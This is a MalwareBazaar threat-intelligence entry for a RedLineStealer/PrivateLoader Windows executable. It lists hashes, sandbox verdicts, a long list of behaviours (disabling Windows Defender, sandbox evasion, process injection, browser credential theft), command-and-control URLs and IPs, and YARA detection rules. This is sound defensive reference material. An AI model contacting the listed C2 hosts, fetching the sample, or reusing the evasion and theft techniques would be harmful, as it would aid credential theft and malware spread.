MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 6ac2f4b8df5f40ab38af32a7538e2fb12eb243002822b1d17ffa1b7ec1010933. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


RedLineStealer


Vendor detections: 14


Intelligence 14 IOCs YARA 9 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 6ac2f4b8df5f40ab38af32a7538e2fb12eb243002822b1d17ffa1b7ec1010933
SHA3-384 hash: 7ec14308d93b42c6ffd29fd20a7b2cdc8cc10983ee16414a7df707521659e9b93b97dfdbef472e5a6e161d7d0da4f6bb
SHA1 hash: c49da1e376ae346d420e1486b7b865ee0d6e1485
MD5 hash: 91f6f48383c2d43120c14b74bf894575
humanhash: mobile-failed-quebec-bravo
File name:SecuriteInfo.com.Trojan.Siggen18.59138.29444.26902
Download: download sample
Signature RedLineStealer
Create hunting rule
File size:5'715'968 bytes
First seen:2022-11-23 20:37:54 UTC
Last seen:2023-01-21 00:08:04 UTC
File type:Executable exe
MIME type:application/x-dosexec
imphash 31a14226d3e64a75d1fc504da54b963c (1 x RedLineStealer, 1 x Amadey, 1 x PrivateLoader)
ssdeep 98304:26L7KoWaVpkMExmC2PaCIpkEmjmvFYBBVEbYU5XdU2PS/Y:x7fC2PhXpmdwcYiXa2PS/Y
Threatray 265 similar samples on MalwareBazaar
TLSH T163462281F789C9B2D04E00319C2B17735F3099584A5AF20B7BACAB6D6EF33C672155B6
TrID 52.9% (.EXE) Win32 Executable (generic) (4505/5/1)
23.5% (.EXE) Generic Win/DOS Executable (2002/3)
23.5% (.EXE) DOS Executable Generic (2000/1)
File icon (PE):PE icon
dhash icon cccca665858178c4 (3 x RedLineStealer, 1 x ArkeiStealer)
Reporter SecuriteInfoCom
Tags:exe RedLineStealer

Intelligence

File Origin
# of uploads :
2
# of downloads :
442
Origin country :
n/a
Vendor Threat Intelligence
Malware family:
redline
Create hunting rule
ID:
1
File name:
https://urloso.com/2hp0pb
Verdict:
Malicious activity
Analysis date:
2022-11-05 03:14:45 UTC
Tags:
opendir loader redline stealer
Link:
https://app.any.run/tasks/84c693d3-c799-45f2-858a-af14822dc17c

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/337827/
Detection(s):
SecuriteInfo.com.Trojan.Siggen18.59138.29444.26902.UNOFFICIAL
Create hunting rule

Result
Verdict:
Malware
Maliciousness:

Behaviour
Searching for analyzing tools
Searching for the window
Creating a file in the Windows subdirectories
Сreating synchronization primitives
Modifying a system file
DNS request
Sending an HTTP GET request
Replacing files
Sending a custom TCP request
Launching a service
Launching a process
Reading critical registry keys
Creating a file
Sending a UDP request
Searching for synchronization primitives
Creating a process from a recently created file
Creating a process with a hidden window
Creating a window
Creating a file in the %temp% subdirectories
Creating a file in the Program Files subdirectories
Running batch commands
Blocking the Windows Defender launch
Enabling autorun with the standard Software\Microsoft\Windows\CurrentVersion\Run registry branch
Adding exclusions to Windows Defender
Sending an HTTP GET request to an infection source
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Tags:
packed shell32.dll
Link:
https://www.filescan.io/uploads/637e84af559d07a06f47145f/reports/51a4d13f-7460-40d5-b0c2-bdeb988f9b1c/overview
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Malware family:
PrivateLoader
Create hunting rule
Verdict:
Malicious
Link:
https://analyze.intezer.com/analyses/4c6d2181-f9de-460e-8362-3c1404f864fe
Result
Threat name:
CryptOne, Fabookie, PrivateLoader, Smoke
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1120109
Signature
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Antivirus detection for dropped file
Antivirus detection for URL or domain
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates HTML files with .exe extension (expired dropper behavior)
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Detected VMProtect packer
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Drops PE files with a suspicious file extension
Drops PE files with benign system names
Found evasive API chain (may stop execution after checking mutex)
Found Tor onion address
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Modifies Group Policy settings
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Obfuscated command line found
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file has nameless sections
Query firmware table information (likely to detect VMs)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Powershell Download and Execute IEX
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected CryptOne packer
Yara detected Fabookie
Yara detected Generic Downloader
Yara detected PrivateLoader
Yara detected SmokeLoader
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 752823 Sample: SecuriteInfo.com.Trojan.Sig... Startdate: 23/11/2022 Architecture: WINDOWS Score: 100 146 Multi AV Scanner detection for domain / URL 2->146 148 Malicious sample detected (through community Yara rule) 2->148 150 Antivirus detection for URL or domain 2->150 152 27 other signatures 2->152 8 SecuriteInfo.com.Trojan.Siggen18.59138.29444.26902.exe 11 52 2->8         started        13 svchost.exe 2->13         started        15 svchost.exe 2->15         started        17 8 other processes 2->17 process3 dnsIp4 134 87.240.137.164 VKONTAKTE-SPB-AShttpvkcomRU Russian Federation 8->134 136 95.142.206.2 VKONTAKTE-SPB-AShttpvkcomRU Russian Federation 8->136 140 19 other IPs or domains 8->140 106 C:\Users\...\n_QGqpyq2g7V5YA0iPGHJFba.exe, PE32 8->106 dropped 108 C:\Users\...\kpD5CuCeDxs2BGQj0A2qfgxw.exe, PE32 8->108 dropped 110 C:\Users\...\k4OoabPg0KMXdh8hRYbKWneV.exe, PE32 8->110 dropped 112 23 other malicious files 8->112 dropped 168 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 8->168 170 Query firmware table information (likely to detect VMs) 8->170 172 Tries to detect sandboxes and other dynamic analysis tools (window names) 8->172 174 7 other signatures 8->174 19 Kw1AE7yL2IYYgMbU7NL9aNk6.exe 8->19         started        24 n_QGqpyq2g7V5YA0iPGHJFba.exe 8->24         started        26 AiuGUJAWhFOK_hkn8fos31kG.exe 8->26         started        34 10 other processes 8->34 28 is-UOMLD.tmp 13->28         started        138 40.127.240.158 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 15->138 30 WerFault.exe 17->30         started        32 MpCmdRun.exe 17->32         started        file5 signatures6 process7 dnsIp8 124 172.67.206.152 CLOUDFLARENETUS United States 19->124 78 C:\Users\user\AppData\Local\...\svchost.exe, PE32+ 19->78 dropped 90 3 other malicious files 19->90 dropped 154 Writes to foreign memory regions 19->154 156 Allocates memory in foreign processes 19->156 158 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->158 160 Injects a PE file into a foreign processes 19->160 80 C:\Users\...\n_QGqpyq2g7V5YA0iPGHJFba.tmp, PE32 24->80 dropped 36 n_QGqpyq2g7V5YA0iPGHJFba.tmp 24->36         started        39 cmd.exe 26->39         started        42 dllhost.exe 26->42         started        82 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 28->82 dropped 84 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 28->84 dropped 92 6 other files (5 malicious) 28->92 dropped 44 Conhost.exe 30->44         started        46 conhost.exe 32->46         started        126 45.10.52.33 MTW-ASRU Russian Federation 34->126 128 157.240.196.35 FACEBOOKUS United States 34->128 130 3 other IPs or domains 34->130 86 C:\Users\user\AppData\Local\Temp\lp0Fki.cpl, PE32 34->86 dropped 88 C:\Users\user\AppData\Local\...\is-UOMLD.tmp, PE32 34->88 dropped 94 3 other malicious files 34->94 dropped 162 Tries to harvest and steal browser information (history, passwords, etc) 34->162 164 Sets debug register (to hijack the execution of another thread) 34->164 48 Install.exe 34->48         started        50 cmd.exe 34->50         started        52 schtasks.exe 34->52         started        54 4 other processes 34->54 file9 signatures10 process11 dnsIp12 96 C:\Users\user\AppData\Local\Temp\...\idp.dll, PE32 36->96 dropped 98 C:\Users\user\AppData\Local\...\PowerOff.exe, PE32 36->98 dropped 100 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 36->100 dropped 102 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 36->102 dropped 57 PowerOff.exe 36->57         started        166 Drops PE files with a suspicious file extension 39->166 62 cmd.exe 39->62         started        64 conhost.exe 39->64         started        104 C:\Users\user\AppData\Local\...\Install.exe, PE32 48->104 dropped 66 powershell.exe 50->66         started        68 conhost.exe 50->68         started        70 conhost.exe 52->70         started        132 104.208.16.94 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 54->132 72 conhost.exe 54->72         started        74 rundll32.exe 54->74         started        76 rundll32.exe 54->76         started        file13 signatures14 process15 dnsIp16 142 37.230.138.123 ROCKETTELECOM-ASRU Russian Federation 57->142 114 C:\Users\user\AppData\...\Pefowycape.exe, PE32 57->114 dropped 116 C:\Users\user\AppData\...\Pefowycape.exe, PE32 57->116 dropped 118 C:\Program Files (x86)\...\Dybufyfulu.exe, PE32 57->118 dropped 120 C:\...\Dybufyfulu.exe.config, XML 57->120 dropped 176 Multi AV Scanner detection for dropped file 57->176 122 C:\Users\user\AppData\...\Fingering.exe.pif, PE32 62->122 dropped 144 195.123.211.56 ITL-LV Bulgaria 66->144 file17 signatures18
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/6ac2f4b8df5f40ab38af32a7538e2fb12eb243002822b1d17ffa1b7ec1010933/
Threat name:
Win32.Infostealer.PrivateLoader
Create hunting rule
Status:
Malicious
First seen:
2022-10-12 16:27:39 UTC
File Type:
PE (Exe)
Extracted files:
53
AV detection:
23 of 26 (88.46%)
Threat level:
  5/5
Detection(s):
Malicious file
Link:
https://check.spamhaus.org/check/?searchterm=nlbpjog7l5akwofpgktvhdrpwexleqyafarldul77inx5qibbezq._file
Verdict:
malicious
Similar samples:
0d0be8ecc5e7c7d3fb48665b5860aa8eb97d367f58af0de01e8bcff3861f4c52
RedLineStealer
23941746340e89fb699e4ecec106fbfd40186fc5b483bf72d82d5d5a2706863f
RedLineStealer
2fbf3507320d77ce68ad429c66ddcf0d53cedcb3cf8396c1057c820737bf9e11
RedLineStealer
3e38c14c9a27966b7768fa6a61a0bc86b79fdf8f554d232c26d0a13cd8dcdc36
RedLineStealer
42b10f1ff71839a9882ae5ac43aa18bb3e98319bc80a1db1162131353fc6e7d0
RedLineStealer
8ae4f12915cd0e748df3991eb25611f475c233aeaaf865ae3ffd42cca2159ca4
RedLineStealer
be607f4670ec8ae8808e6c46603344dcd3d0e58c7e2c7644cf6a360e60f92ce7
RedLineStealer
e882307e9daa68c915a83adb7a7a0e0e8d9c137c6544c964dc3f05f0f7af64a7
RedLineStealer
fa0fbb296de3208283f4d28a43bc59736bf2b4d0c4e97cd6b0f925a8492bdad2
RedLineStealer
+ 255 additional samples on MalwareBazaar
Result
Malware family:
privateloader
Create hunting rule
Score:
  10/10
Tags:
family:privateloader evasion loader main spyware stealer trojan
Link:
https://tria.ge/reports/221123-zeqkhacf67/
Behaviour
Suspicious behavior: EnumeratesProcesses
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Checks whether UAC is enabled
Looks up external IP address via web service
Checks BIOS information in registry
Checks computer location settings
Reads user/profile data of web browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
PrivateLoader
Malware Config
C2 Extraction:
http://91.241.19.125/pub.php?pub=one
http://sarfoods.com/index.php
208.67.104.60
Unpacked files
SH256 hash:
8d7201372a79ec3b26300d4e45e3b0a5173f1489f645fafedc9f8d237bc35e89
MD5 hash:
e61b5f14d26357cf5a3b5d95a7cad911
SHA1 hash:
e04d578f25caea0f9fb84d31d1d34e45524b7b45
Detections:
PrivateLoader
Create hunting rule
win_privateloader_w0
Create hunting rule
win_privateloader_a0
Create hunting rule
Link:
https://www.unpac.me/results/e2c7fcb8-e965-4499-8dec-647bc90a4325/
SH256 hash:
6ac2f4b8df5f40ab38af32a7538e2fb12eb243002822b1d17ffa1b7ec1010933
MD5 hash:
91f6f48383c2d43120c14b74bf894575
SHA1 hash:
c49da1e376ae346d420e1486b7b865ee0d6e1485
Link:
https://www.unpac.me/results/e2c7fcb8-e965-4499-8dec-647bc90a4325/
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
0.96
Link:
https://yomi.yoroi.company/submissions/6ac2f4b8df5f40ab38af32a7538e2fb12eb243002822b1d17ffa1b7ec1010933

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:BitcoinAddress
Create hunting rule
Author:Didier Stevens (@DidierStevens)
Description:Contains a valid Bitcoin address
Rule name:HeavensGate
Create hunting rule
Author:kevoreilly
Description:Heaven's Gate: Switch from 32-bit to 64-mode
Rule name:INDICATOR_EXE_Packed_MPress
Create hunting rule
Author:ditekSHen
Description:Detects executables built or packed with MPress PE compressor
Rule name:MALWARE_Win_DLInjector06
Create hunting rule
Author:ditekSHen
Description:Detects downloader / injector
Rule name:meth_get_eip
Create hunting rule
Author:Willi Ballenthin
Rule name:privateloader
Create hunting rule
Author:andretavare5
Description:PrivateLoader pay-per-install malware
Rule name:Privateloader_Main_Component
Create hunting rule
Description:Detects PrivateLoader Main Component
Rule name:win_privateloader
Create hunting rule
Rule name:win_privateloader_w0
Create hunting rule
Author:andretavare5
Reference:https://tavares.re/blog/2022/06/06/hunting-privateloader-pay-per-install-service

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

RedLineStealer

Executable exe 6ac2f4b8df5f40ab38af32a7538e2fb12eb243002822b1d17ffa1b7ec1010933

(this sample)

  
URLhaus
https://urlhaus.abuse.ch/url/2431662/
  
Delivery method
Distributed via web download
Cape
Cape
https://www.capesandbox.com/analysis/337827/

Comments